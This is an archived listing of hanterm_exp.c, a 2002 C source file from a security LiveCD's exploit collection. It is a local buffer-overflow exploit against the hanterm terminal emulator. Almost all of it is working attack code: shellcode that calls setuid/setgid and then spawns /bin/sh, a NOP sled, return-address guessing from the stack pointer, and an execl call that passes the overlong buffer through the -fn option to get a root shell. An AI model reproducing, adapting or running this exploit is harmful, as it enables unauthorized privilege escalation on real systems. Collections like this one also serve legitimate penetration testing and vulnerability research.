home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / terminals / hanterm_exp.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  61 lines

---

1. /* hanterm_exp.c
2.  *
3.  * local exploit for hanterm
4.  *  .. tested in TurboLinux Server 6.5 (Japan)
5.  *
6.  * thanks my Japanese friend kaju(kaijyu)
7.  * and Japanese hacker UNYUN.
8.  *
9.  *                  by xperc@hotmail.com
10.  *                         2002/02/07
11.  */
12.  
13. #include <stdio.h>
14.  
15. #define NOP        0x90
16. #define MAXBUF        88
17. #define RETOFS        84
18. #define SHELL_OFS     22
19. #define ESP_OFS     -0xe38
20.  
21. unsigned int get_esp()
22. {
23.     __asm__("mov %esp,%eax");
24. }
25.  
26. int main()
27. {
28.         static char shellcode[]={
29.             0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
30.  
31. 0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
32.             0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
33.  
34. 0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
35.             0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
36.             0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
37.             0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
38.         };
39.         unsigned int retadr;
40.     char buf[MAXBUF];
41.         int i;
42.  
43.     memset(buf,NOP,MAXBUF);
44.  
45.     retadr=get_esp()+ESP_OFS;
46.     printf("Jumping address = %p\n",retadr);
47.  
48.     for(i=RETOFS-32;i<RETOFS+32;i+=4){
49.         buf[i]    =retadr&0xff;
50.         buf[i+1]=(retadr>>8)&0xff;
51.         buf[i+2]=(retadr>>16)&0xff;
52.         buf[i+3]=(retadr>>24)&0xff;
53.     }
54.     strncpy(buf+SHELL_OFS,shellcode,strlen
55. (shellcode));
56.     //buf[MAXBUF-1]='\0';       faint!:-(
57.     execl("/usr/bin/X11/hanterm","hanterm","-
58. fn",buf,(char *)0);
59. }
60.  
61.